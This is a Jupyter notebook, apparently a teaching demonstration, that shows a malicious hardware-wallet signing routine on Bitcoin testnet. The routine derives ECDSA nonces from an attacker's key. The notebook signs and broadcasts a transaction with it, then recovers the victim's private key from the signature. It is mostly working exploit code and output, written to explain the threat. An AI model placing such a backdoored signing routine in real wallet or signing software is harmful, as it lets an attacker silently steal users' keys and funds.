In [1]:
from io import BytesIO

# some elliptic curve functions from Jimmy Song's library
from ecc import *
from tx import *

# Hardware wallet
Here we use a single private key and re-use the same address for change

In [2]:
# this is our precious private key
pk = PrivateKey.parse("cVH5H7GqUtrLE6SpU1eef6qF6ZCFfcJqVTRwhFfuT5FW23Vt7W61")
# and the address
pk.address()

'mssLVsHXgm3HneBStXcZFCosPhvisZdVdc'

Sending some money to our friends and sending back the rest. Here we prepare unsigned transaction that we will sign.

Previous transaction: https://live.blockcypher.com/btc-testnet/tx/af21953d35be57b80cc4f8ab29087a9e96b8d66e8588ecaf8f97b1b71789e0ce/

In [3]:
# constructing an unsigned transaction

# input
prev_tx = bytes.fromhex("af21953d35be57b80cc4f8ab29087a9e96b8d66e8588ecaf8f97b1b71789e0ce")
prev_index = 0
tx_in = TxIn(prev_tx, prev_index, b'', 0xffffffff)
tx_in._script_pubkey = Tx.get_address_data(pk.address())['script_pubkey']
tx_in._value = 500000
tx_ins = [ tx_in ]

# outputs
tx_outs = [
    # sending some money to 2ND7BjA2zqqq7Nk3rJDecBbpw6bL3KebbG3
    TxOut(100000, Tx.get_address_data("2ND7BjA2zqqq7Nk3rJDecBbpw6bL3KebbG3")['script_pubkey'].serialize()),
    # change goes back to the same address
    TxOut(390000, Tx.get_address_data(pk.address())['script_pubkey'].serialize())
]

tx = Tx(1, tx_ins, tx_outs, 0, testnet=True)

Attacker puts his private key into the firmware of the hardware wallet and changes signing algorithm.

In [4]:
# attacker's secret key
attacker_key = PrivateKey(0xf00dbabe)

In [5]:
def sign_malicious(tx, input_index, private_key, atk_key=attacker_key):
    """ malicious signing algorithm that uses deterministic nonce with attacker's key instead of ours """
    tx_in = tx.tx_ins[input_index]
    # calculating hash to sign
    z = tx.sig_hash(input_index, SIGHASH_ALL)

    # generating malicious nonce
    k = atk_key.deterministic_k(z)
    # r is the x coordinate of the resulting point k*G
    r = (k*G).x.num
    # remember 1/k = pow(k, N-2, N)
    k_inv = pow(k, N-2, N)
    # s = (z+r*secret) / k
    s = (z + r*private_key.secret) * k_inv % N
    if s > N/2:
        s = N - s
    # signature:
    sig = Signature(r, s)
    
    der = sig.der()
    # append the hash_type to der
    sig = der + bytes([SIGHASH_ALL])
    # calculate the sec
    sec = private_key.point.sec(compressed=private_key.compressed)
    # initialize a new script with [sig, sec] as the elements
    # change input's script_sig to new script
    tx_in.script_sig = Script([sig, sec])
    # return whether sig is valid using tx.verify_input
    return tx.verify_input(input_index)


In [6]:
# signing transaction with malicious nonce
sign_malicious(tx, 0, pk)

True

In [7]:
# signed transaction we broadcast to the network
tx.serialize().hex()

'0100000001cee08917b7b1978fafec88856ed6b8969e7a0829abf8c40cb857be353d9521af000000006b48304502210095ba4188a0714f32e33ece4b9aaa12623d08a8776e76132de642f60848b2488602200880f78ea01206e585e6796324d0bd3ab4ee2dd9a04d0a389cc890a4f153bea801210242c90953666faaeb696de211594e3a69ce00b09c6f457ce227776e89b9fdd8ecffffffff02a08601000000000017a914d9dd4cfdb8bb3f7bed6668012b2f21f392691bfe8770f30500000000001976a914877c5d04279c682d6b58dce5a664e6c92126ab3688ac00000000'

Broadcasted transaction: https://live.blockcypher.com/btc-testnet/tx/3d1647bf88c3a3036a10f6f9a0bd4a2015189b0d74a99bc513c505909d575dea/

# Attacker: private key calculation
He knows his secret `0xf00dbabe` and monitors the blockchain for transactions that use this key to generate nonces.

In [8]:
tx_candidate = Tx.parse(BytesIO(bytes.fromhex("0100000001cee08917b7b1978fafec88856ed6b8969e7a0829abf8c40cb857be353d9521af000000006b48304502210095ba4188a0714f32e33ece4b9aaa12623d08a8776e76132de642f60848b2488602200880f78ea01206e585e6796324d0bd3ab4ee2dd9a04d0a389cc890a4f153bea801210242c90953666faaeb696de211594e3a69ce00b09c6f457ce227776e89b9fdd8ecffffffff02a08601000000000017a914d9dd4cfdb8bb3f7bed6668012b2f21f392691bfe8770f30500000000001976a914877c5d04279c682d6b58dce5a664e6c92126ab3688ac00000000")))
tx_candidate

3d1647bf88c3a3036a10f6f9a0bd4a2015189b0d74a99bc513c505909d575dea
version: 1
tx_ins:
af21953d35be57b80cc4f8ab29087a9e96b8d66e8588ecaf8f97b1b71789e0ce:0

tx_outs:
100000:1LrxjscXgV1P5nisVzN992Ujjiq9zhJ3Z5
390000:1DMPCpCYsjc31XhqAxeBRHbYXiL1xRGdsV

locktime: 0

We check if the attacker's key was used to generate nonce:

In [9]:
# parsing the signature from tx_input and removing last SIGHASH_ALL flag
sig_candidate = Signature.parse(tx_candidate.tx_ins[0].script_sig.elements[0][:-1])
# public key from script sig:
pubkey_sec = tx_candidate.tx_ins[0].script_sig.elements[1]
# calculating what r should be for this transaction. Everything is available from the blockchain.
tx_in = tx_candidate.tx_ins[0]
tx_in._script_pubkey = Tx.get_address_data("mssLVsHXgm3HneBStXcZFCosPhvisZdVdc")['script_pubkey']
tx_in._value = 500000
z = tx_candidate.sig_hash(0, SIGHASH_ALL)
k = attacker_key.deterministic_k(z)
if (k*G).x.num == sig_candidate.r:
    print("Yey! We know the nonce!")


Yey! We know the nonce!


Now we can extract the private key from this transaction. 

`pk = (s*k - h)/r`

There are two options for s in the equation: s and N-s

In [10]:
r_inv = pow(sig_candidate.r, N-2, N)
secret1 = (sig_candidate.s * k - z)*r_inv % N
secret2 = ((N-sig_candidate.s) * k - z)*r_inv % N
# corresponding private keys
pk1 = PrivateKey(secret1, compressed=True, testnet=True)
pk2 = PrivateKey(secret2, compressed=True, testnet=True)
# we can check which one is correct by comparing with the public key in the script sig:
for pkX in [pk1, pk2]:
    if pkX.point.sec(compressed=True) == pubkey_sec:
        print(pkX.wif())

cVH5H7GqUtrLE6SpU1eef6qF6ZCFfcJqVTRwhFfuT5FW23Vt7W61


It is indeed our private key:

In [11]:
pk.wif()

'cVH5H7GqUtrLE6SpU1eef6qF6ZCFfcJqVTRwhFfuT5FW23Vt7W61'